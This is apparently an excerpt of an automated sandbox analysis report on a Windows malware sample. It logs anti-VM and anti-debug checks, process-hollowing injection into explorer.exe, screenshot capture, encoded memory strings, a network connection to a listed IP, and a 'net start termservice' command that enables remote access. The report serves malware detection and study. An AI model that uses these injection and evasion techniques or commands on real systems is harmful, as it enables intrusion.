          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeAPI/Special instruction interceptor: Address: 6CDB7C44
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeAPI/Special instruction interceptor: Address: 6CDB7945
          Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 6CDB3B54
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeAPI/Special instruction interceptor: Address: 6CDB7C44
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeAPI/Special instruction interceptor: Address: 6CDB7945
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: B7A317
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F57E2D rdtsc 12_2_02F57E2D
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3672Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 5915Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cckrnaaJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\djivmxgJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pbxllkvlhugfJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2968Thread sleep count: 3672 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2968Thread sleep time: -110160000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2788Thread sleep time: -540000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2968Thread sleep count: 5915 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2968Thread sleep time: -177450000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1ED13 FindFirstFileExW,12_2_02F1ED13
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE93D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,12_2_02EE93D0
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\userJump to behavior
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
          Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
          Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
          Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F57E2D rdtsc 12_2_02F57E2D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02F0A195
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeCode function: 0_2_00632BED mov eax, dword ptr fs:[00000030h]0_2_00632BED
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0DB50 mov eax, dword ptr fs:[00000030h]12_2_02F0DB50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F57E2D mov eax, dword ptr fs:[00000030h]12_2_02F57E2D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F15D42 mov eax, dword ptr fs:[00000030h]12_2_02F15D42
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F20294 GetProcessHeap,12_2_02F20294
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0A2F8 SetUnhandledExceptionFilter,12_2_02F0A2F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02F0A195
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02F0E87C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F098A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_02F098A8

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.213.173 80Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,12_2_02EE8070
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeNtProtectVirtualMemory: Direct from: 0x6CD3D3F3Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeNtProtectVirtualMemory: Direct from: 0x6CF52A6AJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeNtSetInformationThread: Direct from: 0x63388EJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeNtQuerySystemInformation: Direct from: 0x8B63F0Jump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeNtProtectVirtualMemory: Direct from: 0x6CF52AFFJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 316 base: B779C0 value: 55Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 316 base: 907008 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 2012 base: B779C0 value: 55Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 2012 base: 319D008 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 4108 base: B779C0 value: 55Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: PID: 4108 base: 3144008 value: 00Jump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 907008Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 319D008Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3144008Jump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeBinary or memory string: Shell_TrayWndtooltips_class32U
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0A37F cpuid 12_2_02F0A37F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,12_2_02F2222E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_02F22354
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,12_2_02F2245A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,12_2_02F1842E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_02F22529
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_02F21BC8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,12_2_02F21EB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,12_2_02F21E6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_02F21FDB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,12_2_02F21F50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,12_2_02F17F0C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,12_2_02F21DC3
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeQueries volume information: C:\Users\user\AppData\Local\Temp\d2d22b7a VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dcbc2b90 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dc28f109 VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EEE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,12_2_02EEE8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,12_2_02EE61F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1E6D1 _free,GetTimeZoneInformation,_free,12_2_02F1E6D1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE91B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,12_2_02EE91B0

          Remote Access Functionality

          barindex
          Source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
          Source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
          Source: comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
